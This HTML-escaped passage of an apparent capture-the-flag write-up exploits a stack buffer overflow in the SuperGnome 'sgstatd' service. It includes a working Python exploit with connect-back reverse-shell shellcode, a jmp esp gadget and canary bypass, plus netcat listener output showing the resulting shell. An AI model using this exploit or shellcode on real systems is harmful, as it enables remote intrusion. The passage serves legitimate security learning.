    &lt;span class="n"&gt;fflush&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stdout&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="n"&gt;recv&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;choice&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;switch&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;choice&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="mi"&gt;49&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;fp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;popen&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;/bin/df&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;r&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fp&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;Failed to run command&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fgets&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;fp&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;sgnet_writes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="mi"&gt;50&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;fp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;popen&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;/bin/netstat -tan&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;r&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fp&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;Failed to run command&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fgets&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;fp&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;sgnet_writes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="mi"&gt;51&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;fp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;popen&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;/usr/bin/who&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;r&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fp&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;Failed to run command&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fgets&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;fp&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;sgnet_writes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="hll"&gt;    &lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="mi"&gt;88&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;
&lt;/span&gt;        &lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;&lt;/span&gt;&lt;span class="se"&gt;\n\n&lt;/span&gt;&lt;span class="s"&gt;Hidden command detected!&lt;/span&gt;&lt;span class="se"&gt;\n\n&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;Enter a short message to share with GnomeNet (please allow 10 seconds) =&amp;gt; &amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;75&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;fflush&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stdin&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="hll"&gt;        &lt;span class="n"&gt;sgstatd&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;There seems to be a hidden command when we input &lt;code&gt;88&lt;/code&gt;, which is the
ASCII code of the letter &lt;code&gt;X&lt;/code&gt;. If we input &lt;code&gt;X&lt;/code&gt;, the function
&lt;code&gt;sgstatd&lt;/code&gt; is called. Let's take a look at it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;// File sgstatd.c, line 138&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;sgstatd&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sd&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="n"&gt;__asm__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;movl $0xe4ffffe4, -4(%ebp)&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;    &lt;span class="c1"&gt;//Canary pushed&lt;/span&gt;

    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;bin&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;This function is protected!&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;30&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;fflush&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stdin&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="c1"&gt;//recv(sd, &amp;amp;bin, 200, 0);&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="n"&gt;sgnet_readn&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;bin&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;    &lt;span class="n"&gt;__asm__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;movl -4(%ebp), %edx&lt;/span&gt;&lt;span class="se"&gt;\n\t&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;xor $0xe4ffffe4, %edx&lt;/span&gt;&lt;span class="se"&gt;\n\t&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;&lt;/span&gt;   &lt;span class="c1"&gt;// Canary checked&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;        &lt;span class="s"&gt;&amp;quot;jne sgnet_exit&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ok, so the function &lt;code&gt;sgnet_readn&lt;/code&gt; seems to read data from the socket,
and stock it in a buffer. If we look at it, we can see that there is no
boundary checking. What's more, the buffer &lt;code&gt;bin&lt;/code&gt; only has 100 bytes
allocated, but the program reads and stores 200 bytes of data in it. Can
you say buffer-overflow!&lt;/p&gt;
&lt;p&gt;Let's take a look at the binary, to see what kind of security it as. i'm
using the &lt;code&gt;checksec.sh&lt;/code&gt; (available
&lt;a class="reference external" href="https://github.com/slimm609/checksec.sh"&gt;here&lt;/a&gt;) script to do so:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; /checksec --file sgstatd
&lt;span class="go"&gt;RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH  FORTIFY FORTIFIED FORTIFY-able  FILE&lt;/span&gt;
&lt;span class="go"&gt;No RELRO        No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   No  0       8   sgstatd&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, make sure you run the script on the binary from the firmware, and not
on a binary you compiled from the source code.&lt;/p&gt;
&lt;p&gt;We can see that there is no stack canary, and that &lt;code&gt;NX&lt;/code&gt; is disabled.
This means that we can put our shellcode directly on the stack. Plus,
&lt;code&gt;PIE&lt;/code&gt; is also disabled, so we can use a gadget from our base code, and
its position will be the same on the distant binary.&lt;/p&gt;
&lt;p&gt;Also there is no stack canary, we can see in the code from the &lt;code&gt;sgstatd&lt;/code&gt;
function that there is a hardcoded canary: &lt;code&gt;0xe4ffffe4&lt;/code&gt;. We have to
have this value in our final payload.&lt;/p&gt;
&lt;p&gt;Now, let's find a &lt;code&gt;jmp esp&lt;/code&gt; gadget in our binary, so that we can continue
the flow of execution on the stack. The opcode for such an instruction is
&lt;code&gt;ff e4&lt;/code&gt;. If this value is familiar, it's because it's used in the custom
stack canary (clever organizers)!&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; objdump -M intel -d sgstatd &lt;span class="p"&gt;|&lt;/span&gt; grep &lt;span class="s2"&gt;&amp;quot;ff e4&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt; 8049366:   c7 45 fc e4 ff ff e4    mov    DWORD PTR [ebp-0x4],0xe4ffffe4&lt;/span&gt;
&lt;span class="go"&gt; 80493b2:   81 f2 e4 ff ff e4       xor    edx,0xe4ffffe4&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, our &lt;code&gt;jmp esp&lt;/code&gt; gadget is available at the address &lt;code&gt;0x0804936b&lt;/code&gt;.
Let's see the exploit code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="ch"&gt;#!/usr/bin/env python&lt;/span&gt;

&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;socket&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="c1"&gt;# This is a connect-back shellcode, configured to connect back&lt;/span&gt;
    &lt;span class="c1"&gt;# to a server I own, on the port 8080.&lt;/span&gt;
    &lt;span class="c1"&gt;# Thanks to http://shell-storm.org/shellcode/&lt;/span&gt;
    &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="se"&gt;\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;
    &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="se"&gt;\xcd\x80\x92\xb0\x66\x68\x51\x39\x0B\x02\x66\x68\x1f\x90&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;
    &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="se"&gt;\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;
    &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="se"&gt;\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;
    &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="se"&gt;\x41\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;
    &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="se"&gt;\x89\xe3\xcd\x80&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;

    &lt;span class="n"&gt;payload&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="se"&gt;\x90&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;104&lt;/span&gt; &lt;span class="c1"&gt;# padding to overwrite the saved value of eip&lt;/span&gt;
    &lt;span class="n"&gt;payload&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="se"&gt;\xe4\xff\xff\xe4&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt; &lt;span class="c1"&gt;# canary stack&lt;/span&gt;
    &lt;span class="n"&gt;payload&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="se"&gt;\x6b\x93\x04\x08&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt; &lt;span class="c1"&gt;# address of our &amp;#39;jump esp&amp;#39; gadget&lt;/span&gt;
    &lt;span class="n"&gt;payload&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="se"&gt;\x6b\x93\x04\x08&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;
    &lt;span class="n"&gt;payload&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;
    &lt;span class="n"&gt;payload&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="se"&gt;\x90&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;200&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="nb"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="c1"&gt;# padding to get a length of 200 bytes&lt;/span&gt;

    &lt;span class="c1"&gt;# We connect to our distant server&lt;/span&gt;
    &lt;span class="n"&gt;sock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;socket&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;socket&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;sock&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;settimeout&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mf"&gt;0.5&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;sock&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;connect&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;54.233.105.81&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;4242&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

    &lt;span class="c1"&gt;# We receive all the data we can&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;sock&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;recv&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;4096&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="n"&gt;socket&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;timeout&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;pass&lt;/span&gt;

    &lt;span class="c1"&gt;# We enter the secret command&lt;/span&gt;
    &lt;span class="n"&gt;sock&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;send&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;X&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# We receive all the data we can&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;xrange&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;7&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="n"&gt;sock&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;recv&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;4096&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="n"&gt;socket&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;timeout&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;pass&lt;/span&gt;

    &lt;span class="c1"&gt;# We send our payload&lt;/span&gt;
    &lt;span class="n"&gt;sock&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;send&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;__main__&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We launch our exploit:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; ./exploit_sg05.py
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;And in another terminal, on the server I own:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; nc -lvp &lt;span class="m"&gt;8080&lt;/span&gt;
&lt;span class="go"&gt;listening on [any] 8080 ...&lt;/span&gt;
&lt;span class="go"&gt;connect to [192.168.XX.XX] from ec2-54-233-105-81.sa-east-1.compute.amazonaws.com [54.233.105.81] 42021&lt;/span&gt;
&lt;span class="go"&gt;cat /gnome/www/files/gnome.conf&lt;/span&gt;
&lt;span class="go"&gt;Gnome Serial Number: 4CKL3R43V4&lt;/span&gt;
&lt;span class="go"&gt;Current config file: ./tmp/e31faee/cfg/sg.01.v1339.cfg&lt;/span&gt;
&lt;span class="go"&gt;Allow new subordinates?: YES&lt;/span&gt;
&lt;span class="go"&gt;Camera monitoring?: YES&lt;/span&gt;
&lt;span class="go"&gt;Audio monitoring?: YES&lt;/span&gt;
&lt;span class="go"&gt;Camera update rate: 60min&lt;/span&gt;
&lt;span class="go"&gt;Gnome mode: SuperGnome&lt;/span&gt;
&lt;span class="go"&gt;Gnome name: SG-05&lt;/span&gt;
&lt;span class="go"&gt;Allow file uploads?: YES&lt;/span&gt;
&lt;span class="go"&gt;Allowed file formats: .png&lt;/span&gt;
&lt;span class="go"&gt;Allowed file size: 512kb&lt;/span&gt;
&lt;span class="go"&gt;Files directory: /gnome/www/files/&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The flag for this SuperGnome is &lt;code&gt;4CKL3R43V4&lt;/code&gt;
(&lt;a class="reference external" href="http://www.sou.edu/cs/lynnackler.html"&gt;geeky reference&lt;/a&gt;).&lt;/p&gt;
